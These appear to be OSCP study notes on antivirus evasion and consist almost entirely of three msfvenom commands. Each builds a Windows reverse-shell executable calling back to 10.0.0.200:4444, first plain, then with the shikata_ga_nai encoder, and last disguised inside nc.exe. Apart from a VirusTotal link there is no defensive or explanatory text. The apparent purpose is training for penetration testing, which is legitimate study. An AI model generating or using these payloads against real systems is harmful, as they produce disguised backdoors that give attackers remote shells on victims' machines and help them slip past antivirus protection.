OSCP Learning Notes - Exploit(6)

Antivirus Bypassing

Tools: Kali Linux

Detection Platform: https://www.virustotal.com/gui/home/upload

1.

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT=4444 -f exe -o shell1.exe

OSCP Learning Notes - Exploit(6)

2.

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT=4444 -f exe -e x86/shikata_ga_nai -o shell2.exe

OSCP Learning Notes - Exploit(6)

3.

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT=4444 -f exe -e x86/shikata_ga_nai -x /usr/share/windows-binaries/nc.exe -o shell3.exe

OSCP Learning Notes - Exploit(6)